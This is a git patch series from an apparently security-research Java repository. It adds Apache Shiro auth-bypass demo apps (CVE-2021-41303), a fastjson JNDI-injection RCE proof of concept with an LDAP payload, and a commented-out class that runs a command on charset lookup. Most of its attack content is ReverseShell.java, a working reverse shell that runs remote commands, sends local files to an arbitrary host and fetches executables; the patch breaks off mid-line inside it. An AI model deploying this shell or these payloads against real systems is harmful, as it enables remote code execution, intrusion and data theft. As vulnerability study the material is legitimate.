From 2f802e6af98433f24e08897a33aff0b37c52176f Mon Sep 17 00:00:00 2001 From: threedr3am <929811313@qq.com> Date: Sat, 18 Sep 2021 16:22:06 +0800 Subject: [PATCH 1/5] =?UTF-8?q?=E6=B7=BB=E5=8A=A0shiro=201.7.1=20auth=20by?= =?UTF-8?q?pass?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- fastjson/pom.xml | 14 ++++ fastjson/src/main/java/Evil.java | 27 +++++++ .../bug/fastjson/rce/HadoopHikariPoc.java | 5 +- .../com/threedr3am/bug/fastjson/test/A.java | 53 ------------ .../threedr3am/bug/fastjson/test/Bypass.java | 43 ---------- .../threedr3am/bug/fastjson/test/Test.java | 79 ------------------ .../threedr3am/bug/fastjson/test/TestPoc.java | 80 ------------------- pom.xml | 1 + shiro/auth-bypass(shiro=1.7.1)/pom.xml | 38 +++++++++ .../bug/shiro/bypass/auth/Application.java | 13 +++ .../shiro/bypass/auth/config/ShiroConfig.java | 43 ++++++++++ .../auth/controller/BypassTestController.java | 24 ++++++ .../auth/controller/LoginController.java | 29 +++++++ .../bug/shiro/bypass/auth/realm/MyRealm.java | 24 ++++++ shiro/pom.xml | 2 + 15 files changed, 218 insertions(+), 257 deletions(-) create mode 100644 fastjson/src/main/java/Evil.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/pom.xml create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/fastjson/pom.xml b/fastjson/pom.xml index 377e76cf..a93758cc 100644 --- a/fastjson/pom.xml +++ b/fastjson/pom.xml @@ -171,5 +171,19 @@ ignite-jta 2.8.0 + + + mysql + mysql-connector-java + 8.0.14 + + + + + commons-io + commons-io + 2.7 + + \ No newline at end of file diff --git a/fastjson/src/main/java/Evil.java b/fastjson/src/main/java/Evil.java new file mode 100644 index 00000000..965e2c21 --- /dev/null +++ b/fastjson/src/main/java/Evil.java @@ -0,0 +1,27 @@ +//import java.io.IOException; +//import java.nio.charset.Charset; +//import java.util.HashSet; +//import java.util.Iterator; +// +///** +// * @author threedr3am +// */ +//public class Evil extends java.nio.charset.spi.CharsetProvider { +// +// @Override +// public Iterator charsets() { +// return new HashSet().iterator(); +// } +// +// @Override +// public Charset charsetForName(String charsetName) { +// if (charsetName.startsWith("Evil")) { +// try { +// Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); +// } catch (IOException e) { +// e.printStackTrace(); +// } +// } +// return Charset.forName("UTF-8"); +// } +//} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java index c37e6789..1d81eecb 100644 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java +++ b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java @@ -3,6 +3,7 @@ import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.ParserConfig; import com.threedr3am.bug.common.server.LdapServer; +import com.threedr3am.bug.common.server.RmiServer; /** * fastjson <= 1.2.68 RCE,需要开启AutoType (report by threedr3am to ASRC) @@ -27,8 +28,8 @@ public class HadoopHikariPoc { public static void main(String[] args) { ParserConfig.getGlobalInstance().setAutoTypeSupport(true); - String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}"; - String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}"; +// String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}"; + String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}"; JSON.parse(payload); } } diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java deleted file mode 100644 index 1f0e5377..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java +++ /dev/null @@ -1,53 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.alibaba.fastjson.serializer.SerializerFeature; - -/** - * @author xuanyh - */ -public class A { - private B b; - - public A() { - } - - public A(B b) { - this.b = b; - } - - public B getB() { - return b; - } - - public static void main(String[] args) { - ParserConfig.global.setAutoTypeSupport(true); - - String json3 = JSON.toJSONString(new A(new D()), SerializerFeature.WriteClassName); - System.out.println(json3); - - JSON.parse(json3); - - } -} - -class C implements B { - - @Override - public void x() { - - } -} - -class D implements B { - - @Override - public void x() { - - } -} - -interface B { - void x(); -} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java deleted file mode 100644 index 30a4c0ca..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java +++ /dev/null @@ -1,43 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; - -/** - * @author threedr3am - */ -public class Bypass { - - public static void main(String[] args) { - String json = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"com.threedr3am.bug.fastjson.test.AAAA\", \"rrr\": {\"@type\": \"com.threedr3am.bug.fastjson.test.BBBB\", \"eval\": \"fastjson\"}}"; - JSON.parse(json); - } - -} - -class AAAA implements AutoCloseable { - private BBBB rrr; - - public BBBB getRrr() { - return rrr; - } - - public void setRrr(BBBB rrr) { - this.rrr = rrr; - } - - @Override - public void close() throws Exception { - - } -} - -class BBBB { - private String eval; - public String getEval() { - return eval; - } - public void setEval(String eval) { - System.out.println(eval + " eval!"); - this.eval = eval; - } -} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java deleted file mode 100644 index bd60fcf5..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java +++ /dev/null @@ -1,79 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.alibaba.fastjson.serializer.SerializerFeature; - -/** - * @author xuanyh - */ -public class Test { - - public static void main(String[] args) { - System.out.println("\n1.-------"); - A a = new A(); - a.setI(1); - a.setName("threedr3am"); - String json = JSON.toJSONString(a); - System.out.println(json); - System.out.println(JSON.parse(json).getClass().getName()); - System.out.println(JSON.parseObject(json).getClass().getName()); - - System.out.println("\n2.-------"); - String json2 = JSON.toJSONString(a, SerializerFeature.WriteClassName); - System.out.println(json2); - try { - System.out.println(JSON.parse(json2).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - try { - System.out.println(JSON.parseObject(json2).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - - //todo 以上测试得出,默认不支持指定@type反序列化,即默认AutoTypeSupport=false - - System.out.println("*****************************************************************"); - ParserConfig.global.setAutoTypeSupport(true); - - String json3 = JSON.toJSONString(a, SerializerFeature.WriteClassName); - System.out.println(json3); - try { - System.out.println(JSON.parse(json3).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - try { - System.out.println(JSON.parseObject(json3).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - - //todo 以上测试得出,当AutoTypeSupport=true时,JSON.parse返回具体类型,JSON.parseObject返回的是com.alibaba.fastjson.JSONObject - } - - - static class A { - - private int i; - private String name; - - public int getI() { - return i; - } - - public void setI(int i) { - this.i = i; - } - - public String getName() { - return name; - } - - public void setName(String name) { - this.name = name; - } - } -} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java deleted file mode 100644 index d36aaf33..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java +++ /dev/null @@ -1,80 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.threedr3am.bug.common.server.LdapServer; - -/** - * 挖洞 - * - * @author threedr3am - */ -public class TestPoc { - - static { - //rmi server示例 -// RmiServer.run(); - - //ldap server示例 -// LdapServer.run(); - } - - public static void main(String[] args) { -// MockHttpServletRequest mockReq = new MockHttpServletRequest(); -// DefaultSavedRequest request = new DefaultSavedRequest(mockReq, new PortResolver() { -// -// public int getServerPort(ServletRequest servletRequest) { -// return 0; -// } -// }); -// -// String str = JSON.toJSONString(request, SerializerFeature.WriteClassName); -// System.out.println(str); - -// String str = "{\"rand1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"rand2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658\",\"autoCommit\":true}"; -// String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43658\",\"autoCommit\":true}}"; -// String str = "{\"@type\":\"org.springframework.security.web.savedrequest.DefaultSavedRequest\",\"contextPath\": {\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}}"; - ParserConfig.getGlobalInstance().setAutoTypeSupport(true); -// String str = "{\"a\": {\"$ref\":\"$.class\"}}"; -// AAA aaa = JSON.parseObject(str, AAA.class); -// ParserConfig.getGlobalInstance().setAutoTypeSupport(true); -// String str = "{\"a\": {\"$ref\": \"$.a\"}, \"b\": {\"$ref\": \"$.b\"}, \"c\": {\"$ref\": \"$.c\"}, \"d\": {\"$ref\": \"$.d\"}}"; -// JSON.parseObject(str, AAA.class); -// AAA aaa = new AAA(); -// System.out.println(aaa.getA()); - String json = "{\"\"}"; - JSON.parse(json); -// JSON.parseObject(str); - } -} - -class AAA { - - private String a; - - public String getA() { - System.out.println("call the getA method!..."); - return null; - } - - public void setA(String a) { - this.a = a; - } - - public AAA getB() { - System.out.println("call the getB method!..."); - return null; - } - - public Object getC() { - System.out.println("call the getC method!..."); - return null; - } - - public String getD() { - System.out.println("call the getD method!..."); - return null; - } - - -} diff --git a/pom.xml b/pom.xml index c8406bc2..2a018d87 100644 --- a/pom.xml +++ b/pom.xml @@ -27,6 +27,7 @@ nexus apache-poi java-compile + auth-bypass(shiro=1.7.1) learn-java-bug diff --git a/shiro/auth-bypass(shiro=1.7.1)/pom.xml b/shiro/auth-bypass(shiro=1.7.1)/pom.xml new file mode 100644 index 00000000..8a78d05c --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/pom.xml @@ -0,0 +1,38 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 1.5.22.RELEASE + + + 4.0.0 + + auth-bypass(shiro=1.7.1) + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.apache.shiro + shiro-web + 1.7.1 + + + org.apache.shiro + shiro-spring + 1.7.1 + + + + \ No newline at end of file diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java new file mode 100644 index 00000000..a134e7a3 --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java @@ -0,0 +1,13 @@ +package me.threedr3am.bug.shiro.bypass.auth; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class Application { + + public static void main(String[] args) { + SpringApplication.run(Application.class, args); + } + +} \ No newline at end of file diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java new file mode 100644 index 00000000..d9158717 --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java @@ -0,0 +1,43 @@ +package me.threedr3am.bug.shiro.bypass.auth.config; + +import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm; +import org.apache.shiro.mgt.SecurityManager; +import org.apache.shiro.spring.web.ShiroFilterFactoryBean; +import org.apache.shiro.web.mgt.DefaultWebSecurityManager; +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * @author threedr3am + */ +@Configuration +public class ShiroConfig { + @Bean + MyRealm myRealm() { + return new MyRealm(); + } + + @Bean + SecurityManager securityManager() { + DefaultWebSecurityManager manager = new DefaultWebSecurityManager(); + manager.setRealm(myRealm()); + return manager; + } + + @Bean + ShiroFilterFactoryBean shiroFilterFactoryBean() { + ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean(); + bean.setSecurityManager(securityManager()); + bean.setLoginUrl("/login"); + bean.setSuccessUrl("/index"); + Map map = new LinkedHashMap(); + map.put("/login", "anon"); + map.put("/bypass/*/index", "authc"); + map.put("/bypass/threedr3am/index", "anon"); + bean.setFilterChainDefinitionMap(map); + return bean; + } +} diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java new file mode 100644 index 00000000..2792884b --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java @@ -0,0 +1,24 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.springframework.web.bind.annotation.PathVariable; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RestController; + +/** + * CVE-2021-41303 + * curl http://127.0.0.1/bypass/threedr3am/index/ + * + * @author threedr3am + */ +@RestController +public class BypassTestController { + + /** + * @return + */ + @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET) + public String bypass(@PathVariable(name = "id") String id) { + return "bypass1 -> " + id; + } +} diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java new file mode 100644 index 00000000..e7dd4586 --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java @@ -0,0 +1,29 @@ +package me.threedr3am.bug.shiro.bypass.auth.controller; + +import org.apache.shiro.SecurityUtils; +import org.apache.shiro.authc.AuthenticationException; +import org.apache.shiro.authc.UsernamePasswordToken; +import org.apache.shiro.subject.Subject; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestMethod; +import org.springframework.web.bind.annotation.RestController; + +/** + * @author threedr3am + */ +@RestController +public class LoginController { + + @RequestMapping(value = "/login", method = RequestMethod.POST) + public String login(String username, String password) { + Subject subject = SecurityUtils.getSubject(); + try { + subject.login(new UsernamePasswordToken(username, password)); + return "登录成功!"; + } catch (AuthenticationException e) { + e.printStackTrace(); + return "登录失败!"; + } + + } +} diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java new file mode 100644 index 00000000..58d2897a --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java @@ -0,0 +1,24 @@ +package me.threedr3am.bug.shiro.bypass.auth.realm; + +import org.apache.shiro.authc.*; +import org.apache.shiro.authz.AuthorizationInfo; +import org.apache.shiro.realm.AuthorizingRealm; +import org.apache.shiro.subject.PrincipalCollection; + +/** + * @author threedr3am + */ +public class MyRealm extends AuthorizingRealm { + @Override + protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) { + return null; + } + @Override + protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException { + String username = (String) token.getPrincipal(); + if (!"threedr3am".equals(username)) { + throw new UnknownAccountException("账户不存在!"); + } + return new SimpleAuthenticationInfo(username, "123456", getName()); + } +} diff --git a/shiro/pom.xml b/shiro/pom.xml index 1c3eef48..f108c2d1 100644 --- a/shiro/pom.xml +++ b/shiro/pom.xml @@ -13,6 +13,8 @@ pom + auth-bypass(shiro=1.7.1) + auth-bypass-shiro-1.4.1 From e3b6694a59006eabd358f05c22f3a1aac89e2a91 Mon Sep 17 00:00:00 2001 From: threedr3am <929811313@qq.com> Date: Tue, 21 Jun 2022 20:33:25 +0800 Subject: [PATCH 2/5] add CVE-2022-22980 Learning Demo --- common/src/main/java/ReverseShell.java | 202 +++++++++--------- pom.xml | 81 +++---- .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 shiro/auth-bypass-shiro-1-8-0/pom.xml | 38 ++++ .../bug/shiro/bypass/auth/Application.java | 13 ++ .../shiro/bypass/auth/config/ShiroConfig.java | 39 ++++ .../auth/controller/BypassTestController.java | 22 ++ .../auth/controller/LoginController.java | 29 +++ .../bug/shiro/bypass/auth/realm/MyRealm.java | 24 +++ shiro/pom.xml | 8 +- spring/pom.xml | 1 + .../README.md | 15 ++ .../pom.xml | 39 ++++ .../bug/spring/data/mongodb/Application.java | 15 ++ .../mongodb/controller/DemoController.java | 22 ++ .../bug/spring/data/mongodb/entity/Demo.java | 9 + .../mongodb/repository/DemoRepository.java | 13 ++ .../src/main/resources/application.yml | 8 + 43 files changed, 434 insertions(+), 152 deletions(-) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/pom.xml (96%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/pom.xml (95%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/resources/application.yml (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/pom.xml (94%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/resources/application.yml (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/pom.xml (95%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) create mode 100644 shiro/auth-bypass-shiro-1-8-0/pom.xml create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/README.md create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml diff --git a/common/src/main/java/ReverseShell.java b/common/src/main/java/ReverseShell.java index ecd5d6b0..6b97d042 100644 --- a/common/src/main/java/ReverseShell.java +++ b/common/src/main/java/ReverseShell.java @@ -15,113 +15,117 @@ public class ReverseShell implements Runnable { - private String ip; - private Integer port; + private String ip; + private Integer port; - private InputStream inputStream; - private OutputStream outputStream; + private InputStream inputStream; + private OutputStream outputStream; - public ReverseShell(String ip, Integer port) { - this.ip = ip; - this.port = port; - new Thread(this).start(); - } - - public ReverseShell(InputStream inputStream, OutputStream outputStream) { - this.inputStream = inputStream; - this.outputStream = outputStream; - new Thread(this).start(); - } + public ReverseShell(String ip, Integer port) { + this.ip = ip; + this.port = port; + new Thread(this).start(); + } - @Override - public void run() { - if (outputStream != null && inputStream != null) { - try { - BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream)); - BufferedReader read = new BufferedReader(new InputStreamReader(inputStream)); - String line2; - while ((line2 = read.readLine()) != null) { - bufferedWriter.write(line2); - bufferedWriter.newLine(); - bufferedWriter.flush(); - } - } catch (Exception e) {} - } else { - try { - Socket socket = new Socket(ip, port); - BufferedWriter bufferedWriter = new BufferedWriter( - new OutputStreamWriter(socket.getOutputStream())); - bufferedWriter.write("success!"); - bufferedWriter.newLine(); - bufferedWriter.flush(); + public ReverseShell(InputStream inputStream, OutputStream outputStream) { + this.inputStream = inputStream; + this.outputStream = outputStream; + new Thread(this).start(); + } - BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream())); - while (true) { - String line = bufferedReader.readLine(); - if (line.equals("exit")) - return; - Process pro = null; - try { - if (line.startsWith("${IFS}")) { - line = line.substring(6); - String[] cmd = line.split("\\$\\{IFS\\}"); - pro = Runtime.getRuntime().exec(cmd); - } else if (line.startsWith("download")) { - line = line.substring(8).trim(); - String[] cmd = line.split(" "); - String file = cmd[0]; - String ip = cmd[1]; - String port = cmd[2]; - byte[] bytes = Files.readAllBytes(Paths.get(file)); - Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); - transferFileSocket.getOutputStream().write(bytes); - transferFileSocket.getOutputStream().flush(); - transferFileSocket.getOutputStream().close(); - transferFileSocket.close(); - } else if (line.startsWith("upload")) { - line = line.substring(6).trim(); - String[] cmd = line.split(" "); - String file = cmd[0]; - String ip = cmd[1]; - String port = cmd[2]; - Socket transferFileSocket = new Socket(ip, Integer.parseInt(port)); - InputStream inputStream = transferFileSocket.getInputStream(); - Path path = Paths.get(file); - Files.copy(inputStream, path); - if (Files.exists(path)) { - File toSetFile = path.toFile(); - toSetFile.setExecutable(true); - toSetFile.setReadable(true); - toSetFile.setWritable(true); - } - inputStream.close(); - transferFileSocket.close(); - } else { - pro = Runtime.getRuntime().exec(line); - } - } catch (Exception e) { - bufferedWriter.write(e.getMessage()); - bufferedWriter.newLine(); - bufferedWriter.flush(); - } - if (pro == null) { - continue; - } + @Override + public void run() { + if (outputStream != null && inputStream != null) { + try { + BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream)); + BufferedReader read = new BufferedReader(new InputStreamReader(inputStream)); + String line2; + while ((line2 = read.readLine()) != null) { + bufferedWriter.write(line2); + bufferedWriter.newLine(); + bufferedWriter.flush(); + } + } catch (Exception e) { + } + } else { + try { + Socket socket = new Socket(ip, port); + BufferedWriter bufferedWriter = new BufferedWriter( + new OutputStreamWriter(socket.getOutputStream())); + bufferedWriter.write("success!"); + bufferedWriter.newLine(); + bufferedWriter.flush(); - new ReverseShell(pro.getInputStream(), socket.getOutputStream()); - new ReverseShell(pro.getErrorStream(), socket.getOutputStream()); - } + BufferedReader bufferedReader = new BufferedReader( + new InputStreamReader(socket.getInputStream())); + while (true) { + String line = bufferedReader.readLine(); + if (line.equals("exit")) { + return; + } + Process pro = null; + try { + if (line.startsWith("${IFS}")) { + line = line.substring(6); + String[] cmd = line.split("\\$\\{IFS\\}"); + pro = Runtime.getRuntime().exec(cmd); + } else if (line.startsWith("download")) { + line = 